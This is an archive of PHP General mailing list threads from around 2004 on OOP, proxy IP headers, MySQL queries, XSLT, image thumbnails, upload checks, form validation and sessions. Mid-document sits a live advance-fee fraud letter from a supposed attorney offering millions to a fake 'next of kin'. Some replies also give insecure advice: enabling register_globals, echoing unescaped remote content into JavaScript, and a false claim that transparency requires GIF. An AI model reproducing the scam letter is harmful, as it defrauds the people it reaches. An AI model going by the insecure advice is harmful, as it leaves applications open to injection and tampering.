RE: [PHP] What's the use in OOP?
The OO paradigm maps very closely to problem domains, and is very easy to model. OO let us build more complex software with less effort. In general, OO code has more branches and hence use the stack more than procedural code does. That is why OO code is thought not to be as fast as procedural code. On the other hand it is easier to build better solutions when using OOP, and therefore it is often said that applications written in an OO language is +-10% faster or slower. One can use the OO features in PHP without having to worry about performance penalties. If you are concerned about performance, discussing whether or not to use OOP in PHP would simply be stupid (don't mean to offend anyone), there is so many other variables that will have a far bigger impact on performance than that. Regards, Peter Albertsson Software Engineer and System Architect -Original Message- From: Chris Shiflett [mailto:[EMAIL PROTECTED] Sent: den 29 mars 2004 23:53 To: Stephen Craton; 'PHP List' Subject: Re: [PHP] What's the use in OOP? --- Stephen Craton [EMAIL PROTECTED] wrote: I've been reading up on object oriented programming in PHP for a while now and I just don't get what's the use in using it. It supposedly makes it faster, but I don't really see how in any of my scripts. Makes it faster in what way? I'm curious to know what you've been reading. Using objects is generally faster for the programmer and slower for the computer. YMMV. What's the advantage of OOP anyway, and why are so many people using it now? To really understand this, you need to use it. No one can tell you in one or two lines enough information to explain the entire paradigm or even convince you of its merits. The one-liner attempt of mine would be something like: It helps you associate data with functions that use that data. There are lots of other things, of course. One method of learning about this would be to take every OO term (encapsulation, namespacing, etc.) and find a really good explanation of the term. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming Fall 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Wrong IP address
If your request is going through a proxy, $_SERVER[REMOTE_ADDR] will contain the ip address for the proxy. The proxy might add a HTTP_X_FORWARDED_FOR header to the request which will contain the ip address of the client to the proxy, which should be where the request originated. It is possible for a request to travel through several proxies and then the HTTP_X_FORWARDED_FOR header will be added several times. $_SERVER['HTTP_X_FORWARDED_FOR'] if exists will contain the ip address of where the request originated if the request was proxied. $_SERVER['HTTP_X_FORWARDED_FOR'] may be an array if the request was proxied several times. Regards, Peter Albertsson -Original Message- From: ascll [mailto:[EMAIL PROTECTED] Sent: den 30 mars 2004 03:13 To: [EMAIL PROTECTED] Subject: [PHP] Wrong IP address Greetings, I make use of these: - ?php echo($_SERVER[REMOTE_ADDR]); ? to get the web IP address for my machine once my PC is connected to Internet.. Anyway, sometime I get the correct IP address, but sometime NOT. Does anyone know why? Thanks in advance. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] auto increment
execute the following query: SELECT LAST_INSERT_ID(); Peter -Original Message- From: marc serra [mailto:[EMAIL PROTECTED] Sent: dinsdag 17 februari 2004 20:17 To: [EMAIL PROTECTED] Subject: [PHP] auto increment Hi, i use PEAR DB with a mysql database and i want to know if there is a solution to get last inserted id in a table. I see that I can use sequences but it doesn't work with mysql. Thanks, Marc. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Problem with XSLT parser
Hello group, I am having problems to transform xml document with xslt_process(). This is my code: ?php $xh = xslt_create(); $result = xslt_process($xh, 'file://test.xml', 'file://test.xsl'); if ($result) echo $result; xslt_free($xh); ? test.xml: ?xml version=1.0 encoding=iso-8859-1? root person namePeter Billen/name age16/age /person /root test.xsl: ?xml version=1.0 encoding=UTF-8? xsl:stylesheet version=1.0 xmlns:xsl=http://www.w3.org/1999/XSL/Transform; xsl:include href=test2.xsl/ /xsl:stylesheet test2.xsl: ?xml version=1.0 encoding=UTF-8? xsl:stylesheet version=1.0 xmlns:xsl=http://www.w3.org/1999/XSL/Transform; xsl:template name=bla DUMMY /xsl:template /xsl:stylesheet It gives the following error: Warning: Sablotron error on line 3: cannot open file 'test.xsl/test2.xsl' in E:\htdocs\test.php on line 5 So I believe the xsl:include in test.xsl is not working properly. If I remove that line (so I don't use test2.xsl), it works perfect, it prints out Peter Billen 16 (it uses the built-in rules). And my second question is: why is the home path of the XSLT parser c:\program files\apache\bin and not the www-home directory I set in httpd.conf (e:\htdocs in my case) Thanks all, -- Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Question about php forwarding to javascript
Thanks!
It works like a charm!
/peter
On Sun, 15 Feb 2004 07:52:11 +0100 (CET), you wrote:
Could be missing the point here because your question is quite vague.
However...
I am using a web page that uses the following php code to display the
contents of a dynamically update webpage:
?php
include(http://.../source.xls);
?
Is it possible to forward the contents of the code to a javascript?
eg if the file source.xls contains the text help me is it possible to
send that text to a javascript? I am quite stuck here so any help would
be
greatly appreciated.
source.xls just contains a bit of text, right? And you want that to end up
in a Javascript variable?
First, I'd use file_get_contents() or file() to get the contents of
source.xls into a PHP array.
$source = file_get_contents ('http://.../source.xls');
Next, you have to remember that Javascript is just text, the same as HTML.
So you can embed $source into a Javascript block in the same way as you
would embed it into HTML.
script language=Javascript
function doAlert ()
{
var source = ? echo ($source) ?;
alert (source);
}
/script
a href='javascript:doAlert()'Click Me/a
Apologies for any mistakes in the Javascript, but I'm sure you get the
idea.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Question about php forwarding to javascript
Hi! I am using a web page that uses the following php code to display the contents of a dynamically update webpage: ?php include(http://.../source.xls); ? Is it possible to forward the contents of the code to a javascript? eg if the file source.xls contains the text help me is it possible to send that text to a javascript? I am quite stuck here so any help would be greatly appreciated. regards Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Copyrighting PHP, MySql, Apache,perl etc...
Ryan A wrote: Which brings up a little question, any idea of whats ZEND's (or anybody else that matters) opinion of using PHP in a domain name? eg: my-lovely-php-and-apache-website.com Have a look at http://www.php.net/license/ We cannot really stop you from using PHP in the name of your project unless you include any code from the PHP distribution, in which case you would be violating the license. But we would really prefer if people would come up with their own names independent of the PHP name. Why you ask? You are only trying to contribute to the PHP community. That may be true, but by using the PHP name you are explicitly linking your efforts to those of the entire PHP development community and the years of work that has gone into the PHP project. Every time a flaw is found in one of the thousands of applications out there that call themselves PHP-Something the negative karma that generates reflects unfairly on the entire PHP project. We had nothing to do with PHP-Nuke, for example, and every bugtraq posting on that says PHP in it. Your particular project may in fact be the greatest thing ever, but we have to be consistent in how we handle these requests and we honestly have no way of knowing whether your project is actually the greatest thing ever. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Drop down lists
Yes it's possible. I believe there's a way to do it with PEAR also but I've never done it that way before. I always do:
---
SELECT name = username
OPTION selected--- Please Choose a Username ---/OPTION
?php
// retrieve a list of usernames from the DB
$results = mysql_query(SELECT userID, username FROM users)
or die (could not perform requested query);
// make sure we got a list of usernames back
if (mysql_num_rows($results) != 0)
{
// process the returned results
for ($i = 0; $i mysql_num_rows($results); $i++)
{
// get a row of results back from the result set
$row = mysql_fetch_array($results);
// construct the dropdown menu item
echo OPTION value = \ . $row[userID] . \ . $row[username] . /OPTION;
}
}
else
{
echo No names in the database;
}
?
/SELECT
Of course you need to embed this within a FORM tag.
-Pete
---
On Sun, 2004-01-18 at 01:18, BigMark wrote:
Is it possible to have usernames from my db populated into a drop down
list.
If so What and where does it go to make it all work, ive tried everything i
know
( which is not much by the way).
Mark
--
perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)'
signature.asc
Description: This is a digitally signed message part
Re: [PHP] Thumbnails in database
On Sat, 2004-01-17 at 16:44, Kevin Waterson wrote: Why create thumnails? You can resize the images on the fly when needed. This would be too expensive. I need to store the thumbnails in the database. So, I need to resize the image at the same time as I store it. I can do this and save the thumbnail in the file system, but cannot save the thumbnail in the database. Kevin, I'm working on a web based photo gallery site which stores images in a MySQL database so you and I are working on something pretty similar. Like you I'm storing both the thumbnail (150x150) and a full sized image (768x512 or 512x768 depending on image orientation) in the database. You you could only store the full sized images in a database and resize them to thumbnails when they are needed but when you have 25 or more thumbnails to display on the same page resizing them on the fly pegs the CPU at 100% and if you have any other sites running on that same box they will experience a slow down too so that is why I opted to store the thumbnails in the database also. Disk space is very cheap and the thumbnails don't take too much space. Worse case scenario you can add another drive to the machine you are hosting the site on and presto, you have more disk space. In my web application I create the thumbnail and the full sized image all in one pass when a user uploads an image though a web page. Creating both the thumbnail and the full size images doesn't take that much CPU time. If I load in an image from my 2 megapixel digital camera (1600x1200) it will take 0.3 seconds on my 1.8GHz P4 to resize the image to a thumbnail and to a full sized image to be displayed in my web gallery. I don't know how to create an image in memory and write that to the database so I'm writing both the thumbnail and the full sized image out to my /tmp directory and then re-reading them into the database. At first I thought it might seem to be a bit inefficient but with this method I'm getting the 0.3s time to read in the original file, create a thumbnail, write it out to disk, read it into the database, create a full sized image, write it out to disk, read it into the database so I'm pretty happy with it. The code goes something like this: --- // read in the image file from the disk that needs to be resized and uploaded $image_original = ImageCreateFromJpeg($path_to_image_file_on_disk); // allocate memory for the thumbnail image $image_thumbnail = ImageCreateTrueColor($thumbnail_width, $thumbnail_height); // copy and resize the original image into the thumbnail memory we have allocated ImageCopyResized($image_thumbnail, $image_original, 0, 0, 0, 0, $thumbnail_width, $thumbnail_height, imagesx($image_original), imagesy($image_original)); // save the newly created thumbnail to disk ImageJpeg($image_thumbnail, $path_to_save_thumbnail_image, 100); // open up the thumbnail file for reading and then encode it with MIME Base64 $thumbnail_contents = base64_encode(fread(fopen($path_to_read_thumbnail_from, rb), filesize($path_to_read_thumbnail_from))); // delete the thumbnail file from the disk unlink($path_to_read_thumbnail_from); // deallocate memory used to create our original and thumbnail images ImageDestory($image_original); ImageDestory($image_thumbnail); --- You do the same thing for the full sized image you want to store in the database as well but you have to make sure you get the image's orientation right otherwise your resize will give you a hard time. When it's time to insert the images into the database for the thumbnail you will insert $thumbnail_contents and whatever else variable you chose for the full sized image. One thing to watch out for is that when you read the images from the database you want to use base64_decode() on them. Hope this works out for you. If you need more help give me a shout. -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] dynamicly generating a transparent truecolor image
If you want to create a transparent image don't forget it must be a GIF. At least that's what my graphics guys have been telling me all these years :) -Pete On Jan 16, 2004, at 04:41, Michel van der Breggen wrote: hi, i have a problem, i would like to dynamicly generete a transparent truecolor image in php. The problem is that imagecreatetruecolor standard creates a black image. Does anybody have a solution for this? Thanks in advance, Michel van der Breggen [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] URL rewriting...anybody done this?
I had the same problem with PHP after I've upgraded to 4.3.3 from 4.3.1. I was tearing my hair out but couldn't figure out what was wrong. I ended up editing my php.ini file and turning REGISTER GLOBALS = On. It works fine now and since this is on my development box I don't really care about security that much. Hope this helped...
-Pete
P.S.: This all happened on a Gentoo Linux box...
On Wed, 2004-01-14 at 17:11, Ryan A wrote:
Oops sorry, missed that.
Heres whats on top of the page:
echo Ok,we are in show.phpbr;
if(isset($_GET[id])){echo Got \$_GET[id]br;}else{echo No
\$_GET[id]br;}
if(isset($_GET[sid])){echo Got \$_GET[sid]br;}else{echo No
\$_GET[sid]br;}
print_r($_GET);
print_r($_GET['id']);
print_r($_GET['sid']);
and heres the output:
Ok,we are in show.php
No $_GET[id]
No $_GET[sid]
Array ( )
Ideas?
Cheers,
-Ryan
On 1/14/2004 10:56:35 PM, Jason Wong ([EMAIL PROTECTED]) wrote:
On Thursday 15 January 2004 05:01, Ryan A wrote:
I put this in for testing:
if(isset($_GET[id])){echo Got \$_GET[id]br;}else{echo
No
\$_GET[id]br;}
if(isset($_GET[sid])){echo Got \$_GET[sid]br;}else{echo
No
\$_GET[sid]br;}
and heres the output:
No $_GET[id]
No $_GET[sid]
So the variables are not being passed
Any idea why and what I can do about this?
(Am a total newbie here)
As was previously suggested just do a
print_r($_GET)
to see what, if anything,
you're getting.
--
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design Hosting * Internet Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Price's
Advice:
It's all a game -- play it to have fun.
*/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)'
signature.asc
Description: This is a digitally signed message part
[PHP] File Upload Name Mangling Question
I'm trying to upload a JPEG image into a database using PHP and I was successful with the upload. However today I wanted to add a check to make sure the user can only upload JPEG files and not any other files so I use preg_match() to check for the strings .jpg or .jpeg in the filename and after I've inserted this check into my code all my attempts to upload files started to fail. I was mulling over the code and I decided to print out the name of the uploaded file and to my suprise the name was mangled. Instead of it being picture.jpg it was /tmp/progtemp/php/uploads/phpeZQiXd. Can anyone shed some light as to how I could check to make sure that only JPEG images get uploaded ? Thanks in advance... -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] File Upload Name Mangling Question
On Mon, 2004-01-12 at 19:33, Richard Davey wrote: The filename isn't always the best way to tell. I mean I could rename an mp3 to jpg and you'd think it was a jpg and happily insert it into your database. Instead it's probably better to test the integrity of the image itself. I didn't even think about that. Thank you :) If it's available on your web host (and it probably is) use this function: getimagesize() Specifically, look at the 2nd index in the returned array (the image type). I was about the get the size of the image anyway so this way I can kill two birds with one stone. Thanks for the help Richard ! -Peter -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
[PHP] Ver 5.0 Questions ...
I was wondering if there is a timeline for version 5, if so where can I find it ... Also I am developing an application that I pass a lot of objects by reference, will that cause problems in version 5 ? As far as I can see in the http://www.php.net/zend-engine-2.php there is nothing there to suggest that this will be a problem thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Exception number: c0000005 (access violation
Usually under Windows when you get a Memory Access Violation its a good indication that your power supply or RAM is on its way out. Is this happening to all apps or only PHP ? Unfortunately I don't know how to debug using a Dr. Watson dump but I do know of a free memory testing utility called MemTest86 (http://www.memtest86.com/). Sorry if I wasn't too much of a help. -Pete On Sat, 2004-01-10 at 17:06, Gunter Sammet wrote: I have 4.3.5-dev (Build Dec-22-2003) installed on a W2K Dell Inspiron 7500 and I am getting an error which I don't get with 4.1.1 and 4.3.4. Would like to learn how to debug things like that. Here is a dump of Dr. Watson: Application exception occurred: App: (pid=2228) When: 1/10/2004 @ 14:51:33.711 Exception number: c005 (access violation) * System Information * Computer Name: DELL User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 8 Stepping 3 Windows 2000 Version: 5.0 Current Build: 2195 Service Pack: 4 Current Type: Uniprocessor Free Registered Organization: SammySolutions.com ltd. Registered Owner: Gunter Sammet * Task List * 0 Idle.exe 8 System.exe 148 smss.exe 172 csrss.exe 168 winlogon.exe 220 services.exe 232 lsass.exe 384 svchost.exe 436 svchost.exe 488 spoolsv.exe 512 ati2plab.exe 536 ibserver.exe 580 APACHE.exe 708 regsvc.exe 728 MSTask.exe 732 APACHE.exe 968 snmp.exe 1028 stisvc.exe 1060 vsmon.exe 1112 WinMgmt.exe 1136 svchost.exe 1164 svchost.exe 120 Explorer.exe 1460 jusched.exe 1448 interserver.exe 1440 Atiptaxx.exe 1420 EM_EXEC.exe 1392 zapro.exe 640 internat.exe 1512 AirPlus.exe 1520 trillian.exe 1760 mysqld-nt.exe 1796 PostCastServer..exe 1820 gcdnssrv.exe 1860 OUTLOOK.exe 996 IEXPLORE.exe 1916 IEXPLORE.exe 1980 IEXPLORE.exe 2020 IEXPLORE.exe 2060 IEXPLORE.exe 2100 IEXPLORE.exe 2184 PHPEdit.exe 2200 DBGLIS~1.exe 2168 IEXPLORE.exe 2280 IEXPLORE.exe 2192 IEXPLORE.exe 1084 APACHE.exe 1020 APACHE.exe 2228 php.exe 1532 drwtsn32.exe 0 _Total.exe (0040 - 0040D000) (77F8 - 77FFB000) (1000 - 1015) (7C4E - 7C599000) (77E1 - 77E75000) (77F4 - 77F7C000) (7505 - 75058000) (7503 - 75044000) (7800 - 78045000) (7C2D - 7C332000) (77D3 - 77D9E000) (7502 - 75028000) (77A5 - 77B3C000) (779B - 77A4B000) (1F7C - 1F7F4000) (76B3 - 76B6E000) (6318 - 631E5000) (7171 - 71794000) (782F - 78538000) (00CC - 00CD6000) (6E42 - 6E426000) (75E6 - 75E7A000) (782C - 782CC000) (7798 - 779A4000) (7734 - 77353000) (7752 - 77525000) (7732 - 77337000) (7515 - 7515F000) (7517 - 751BF000) (7C34 - 7C34F000) (751C - 751C6000) (7795 - 7797A000) (773B - 773DF000) (7738 - 773A3000) (7783 - 7783E000) (7788 - 7790E000) (7C0F - 7C152000) (774E - 77513000) (774C - 774D1000) (7753 - 77552000) (7736 - 77379000) (777E - 777E8000) (777F - 777F5000) (74FD - 74FEE000) (7501 - 75017000) State Dump for Thread Id 0x738 eax=0001 ebx=0005 ecx=0098 edx=00794010 esi=0012fd18 edi=00ce eip=77fcc2e2 esp=0012fb0c ebp=0012fca4 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=0246 function: RtlAllocateHeap 77fcc2ca 51 pushecx 77fcc2cb 51 pushecx 77fcc2cc 81ec7401 sub esp,0x174 77fcc2d2 53 pushebx 77fcc2d3 56 pushesi 77fcc2d4 57 pushedi 77fcc2d5 8b7d08 mov edi,[ebp+0x8] ss:00bd9b8a= 77fcc2d8 897da4 mov [ebp+0xa4],edi ss:00bd9b8a= 77fcc2db 8065b800 and byte ptr [ebp+0xb8],0x0 ss:00bd9b8a=?? 77fcc2df 8b450c mov eax,[ebp+0xc] ss:00bd9b8a= FAULT -77fcc2e2 0b4710 or eax,[edi+0x10] ds:01789ee6= 77fcc2e5 89450c mov [ebp+0xc],eax ss:00bd9b8a= 77fcc2e8 a9600f037d testeax,0x7d030f60 77fcc2ed 0f856aee jne _eFSQRT+0xe93 (77fcb15d) 77fcc2f3 817d100080 ss:00bd9b8a= cmp dword ptr [ebp+0x10],0x8000 77fcc2fa 0f835dee jnb _eFSQRT+0xe93 (77fcb15d) 77fcc300 837d1000 cmp dword ptr [ebp+0x10],0x0 ss:00bd9b8a= 77fcc304 0f8424f8 je RtlSizeHeap+0x228 (77fcbb2e) 77fcc30a 8b4510 mov eax,[ebp+0x10] ss:00bd9b8a= 77fcc30d 83c00f add eax,0xf 77fcc310 24f8 and al,0xf8 77fcc312 8945e0 mov [ebp+0xe0],eax ss:00bd9b8a= * Stack Back Trace * FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0012FCA4 100C03A2 00CE 0001
RE: [PHP] Display syslog file?
On Fri, 2004-01-09 at 10:05, Carlton L. Whitmore wrote: I'm using the root user to access the file so rights aren't an issue. Actually it is an issue because PHP is not running with root privileges (at least I hope you haven't changed it and made it run with root privileges; that would be a _bad_ thing). The reason why only root can access your syslog file is because it contains very specific information about what is running on your machine. If the syslog file would be readable by all users on your machine then a clever user could gain root access by exploiting something that he/she found in the syslogfile. It's usually not a good idea to publish the contents of your syslog file to the world accessable via HTTP either. However if you want to throw caution to the wind keep reading... I want to display the file thru a webserver. I'd like the page to refresh so I can watch the activity coming in from my SonicWall router. I don't mind watching all the activity coming in on that syslog file, maybe later I can limit what is displayed. Ok, so we know that the PHP process does not have access to your syslog file because the file is read-only/write-only by root _and_ read-only by users who are in the root group: -rw-r- 1 root adm 1285 Jan 9 06:00 /var/log/syslog I assume you are running PHP as an apache module and apache is running as user apache on your system. So check to see if the apache user is in the root group (the command is group apache). If the command only returns apache (which it should) then it means that the apache user is only part of the apache group on your system. What you could do is add the apache user to the root group but please understand you are creating a big security hole here. When joe hacker comes along and notices this he can trick your apache server to run command on your machine with root privileges. Not a good thing... Another, less intrusive, way to do this is to create a cron job (as root) that executes every minutes and copies the contents of the syslog file into another file, readable by the apache user, and displaying the contents of that file on your webpage. The downside to this is that you will have a 1 minute delay in the information you see on the webpage. Hope this helped... -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] md5() and string-length?
It's always a 32 character string. http://us4.php.net/manual/en/function.md5.php -Peter On Fri, 2004-01-09 at 11:30, Michael Mller wrote: Hi, is anybody here who knows the max_length of a string which is encoded by md5()? thx, Michael Berlin, Germany -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] md5() and string-length?
Sorry my bad; I read your post but I didn't understand it fully. I agree with the others; there is no theoretical limit (only physical like available memory, disk space, etc..) to the size of a string which you can pass to the md5() function. -Pete On Fri, 2004-01-09 at 12:29, Michael Mller wrote: mhm, I think there was a missunderstanding ;) I want to know, how long the input-string could be (so that the encoded strings, that you get, are unique) Michael -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] Form validation: client- or server-side?
On Fri, 2004-01-09 at 13:07, Matt Grimm wrote: Is there a distinct advantage to doing form validation / error checking on the server side using PHP? That's how I've always done it because I know PHP better than _javascript_, but wouldn't it make sense to validate as much of your form as possible using _javascript_ before the form was ever posted? I'm just talking about the basics, like empty required fields, illegal characters, string lengths, etc. I would shove off as much work as possible for the client to do on his/her machine and not bog down my server which could be busy serving pages/processing bigger and better things. Plus it also cuts down on bandwidth because you only send the form to the server if the _javascript_ checked everything and didn't find any errors. The downside is that you have to make sure the client has _javascript_ turned on otherwise your form authentication will not work and the code for your _javascript_ is available to the user to see and if you have any bugs in it then they can see and work around it. I guess it would depend on the site you are planning to do the authentication on. If the site is not super busy, bandwidth is not an issue and your server is not pegged at 100% most of the time then I would suggest using PHP to validate your forms because it's safer since the client can not see your code and it doesn't matter if the user has _javascript_ turned on of off. Just my $0.02... -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] Form validation: client- or server-side?
On Fri, 2004-01-09 at 14:22, Chris Shiflett wrote: But, no matter what, always validate data on the server. Otherwise, it's like being a teacher and having your students grade their own work; it only works when everyone is honest (and I can guarantee you that won't be the case on a public Web site). Just to play devil's advocate; why would you validate data on the server if you have a _javascript_ that checked the user's input before it gets submitted to the server ? I mean the whole point of you having that _javascript_ is to make sure the the correct data gets entered so why bother checking it once again on the server-side with PHP ? Wouldn't that be redundant and a waste of resources ? -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
Re: [PHP] Form validation: client- or server-side?
It makes perfect sense now. Thanks for clearing it up for me Chris :) -Peter On Fri, 2004-01-09 at 15:29, Chris Shiflett wrote: --- Peter Vertes [EMAIL PROTECTED] wrote: Just to play devil's advocate; why would you validate data on the server if you have a _javascript_ that checked the user's input before it gets submitted to the server? I mean the whole point of you having that _javascript_ is to make sure the the correct data gets entered so why bother checking it once again on the server-side with PHP? Wouldn't that be redundant and a waste of resources? The redundancy is in performing client-side validation, because you should never consider server-side validation as optional. Aside from the obvious fact that people can (and should be able to) turn off any client-side scripting, an attacker can do things far more sophisticated, to the point of writing a specialized Web client specifically to attack your site. When you receive a POST request, it will look something similar to this: POST /path/to/script.php HTTP/1.1 Host: example.org Content-Type: application/x-www-form-urlencoded Content-Length: 35 Connection: close first_name=chrislast_name=shiflett That's it. This may have resulted from the user submitting the following HTML form: form action="">http://example.org/path/to/script.php method=post input type=text name=first_name / input type=text name=last_name / input type=submit / /form You really can't tell what form was used on the receiving site, right? In fact, you can't even be sure that the user used a form at all. As an example, people ask on this list about performing a POST with PHP at least once a week. PHP doesn't need to use an HTML form for this; it just sends a request similar to the above (see http://shiflett.org/hacks/php/http_post for an example). The point is that the client decides what it sends, not you. If you want to think about security, you have to get rid of the assumption that your users will all use your site exactly as you intend. As I mentioned before, client-side checking is basically like saying, User, can you please send me a username only if it is less than 10 characters in length and alphanumeric only? Someone attacking your site is not going to abide by your requests. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security Handbook Coming mid-2004 HTTP Developer's Handbook http://httphandbook.org/ -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
[PHP] Image Resizing with GD
Hello List, I've tried googling but couldn't come up with anything useful so I'm turning to the list. Could anyone send me a link to a tutorial on how to resize images with GD ? Thanks in advance... -Pete -- perl -e 'print pack(H*, 70766572746573406E79632E72722E636F6D0A)' signature.asc Description: This is a digitally signed message part
[PHP] IN ANTICIPATION OF A MUTUAL BUSINESS RELATIONSHIP
I am PETER MBA, an attorney at law, personal attorney to this engineering contractor, a National of your country, who used to be a contractor with a Mining Company here in South Africa. Herein shall be referred to as my client. On the 21st of April 2001, my client, his wife and their only daughter Were involved in a car accident along Pretoria Express Road. All occupants of the vehicle unfortunately lost their lives. Since then I have made several enquiries to your embassy here to locate Any of my client's extended relatives, this has also been unsuccessful. After these several unsuccessful attempts, I decided to track his last name over the Internet, to locate any member of his family hence I contacted you. I have contacted you to assist in repatriating the fund valued at US$15.95 million left behind by my client before it gets confiscated or declared unserviceable by the Security Finance Firm where this huge amount was deposited. The said Security Finance Company has issued me a notice to provide the Next of kin or have his account confiscated within the next twenty-one Official working days. Since I have been unsuccessful in locating the relatives for over 2years now, I seek your consent to present you being the next of kin to the deceased since you have the same last name, so that the proceeds of this account can be paid to you. Therefore, on receipt of your positive response, we shall then discuss the sharing ratio and modalities for transfer. I have all necessary information and legal documents needed to back you up for claim. All I require from you is your honest co-operation to enable us see this transaction through. I guarantee that this will be executed under Legitimate arrangement that will protect you from any breach of the law. Please get in touch with me for more details. With Regards, PETER MBA. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] possible bug in PHP function mysql_query() ?
MySQL version: 4.0.16 PHP version: 4.3.2 Problem code: $query = SELECT * FROM tablename WHERE columnname LIKE '%any_eight_digits%'; mysql_query($query); Results: query fails, mysql_errno() returns 1064 (syntax error) I have tracked the problem down to the WHERE clause; using any other number of digits (except eight), the query suceeds. It seems to be a problem with the comparison logic, because other comparison operators also fail; specifically, I have tested WHERE columnname = any_eight_digits and WHERE columnname = 'any_eight_digits' When running the identical query in PhpMyAdmin 2.5.5 RC1, or at the MySQL command line, the query works without a problem. I am a PHP/MySQL newbie. Before I rush off and report this as a PHP bug, can anyone else confirm this behavior, or explain what I am doing wrong? Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] programming the onclick() event in an anchor [FIXED]
Evan, Thank you for responding - as a newbie to PHP, HTML, and JavaScript, the cookie approach is a little too complex for me. However, after googling some more, I came across the following approach which seems to be simple and works well: (a) enclose the result table within a form, specifying the form name as results, the post method, and action as the page url to be loaded when the anchor is clicked. (b) insert a hidden field (seqnum) within the form. (c) In the php code which builds the table, for the anchor link, use the following code: ($seqno is the data to be passed) print a href=\javascript://\ onclick=\document.results.seqnum.value=$seqno;document.results.submit();\; Result: $HTTP_POST_VARS['seqnum'] will be set to the sequence number. The only downside to this method seems to be that the visited anchors do not change color. Can anyone suggest how to fix that? Peter Evan Nemerson wrote: On Wednesday 24 December 2003 08:06 pm, Peter Walter wrote: I have written a session-enabled php page which displays a table of search results. The first column in the table contains anchor links to www.mydomain.com/mypage?seqno= where seqno is a variable I would like to pass when the anchor is clicked. However, I do not wish the ?seqno= to display in the url of the browser. After googling a lot, it appears that I can use JavaScript to set a session variable in the I doubt it- otherwise it would be pretty easy to set, say $_SESSION['logged_in'] onclick() event, but I have not been able to find an example of how to But you /can/ use JS to set a cookie, which can be retrieved (and stored in a session variable if you want) by PHP. http://www.webreference.com/js/column8/ http://us4.php.net/manual/en/reserved.variables.php#reserved.variables.cookies do it. Does anyone have experience doing this? Sample code would be greatly appreciated. http://www.webreference.com/js/column8/functions.html Peter
[PHP] programming the onclick() event in an anchor
I have written a session-enabled php page which displays a table of search results. The first column in the table contains anchor links to www.mydomain.com/mypage?seqno= where seqno is a variable I would like to pass when the anchor is clicked. However, I do not wish the ?seqno= to display in the url of the browser. After googling a lot, it appears that I can use JavaScript to set a session variable in the onclick() event, but I have not been able to find an example of how to do it. Does anyone have experience doing this? Sample code would be greatly appreciated. Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sessions simply don't work
Ken, I had exactly the same problem and it really stumped me for a while. Check your php start and end tags carefully - even a single space before or after the ?php ? tags (before the session_start() ) will cause this problem. Check any included files before the session_start(). Peter Brad Pauly wrote: On Fri, 2003-12-19 at 13:18, ken lee wrote: I'm getting this message all the the time I try to start a session with session_start. Cannot send session cookie - headers already sent It's the first line of code in the file. I'm even getting the error with a single session_start() function on its own in a file. It fails on Apache on my intranet and IIS after being uploaded to a web server. The browser is set to recieve cookies. All the books say it should work. Is there anything before the first line of code? Any whitespace or html will cause this error. - Brad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] url rewriting within sessions - confused newbie needs help - [FIXED]
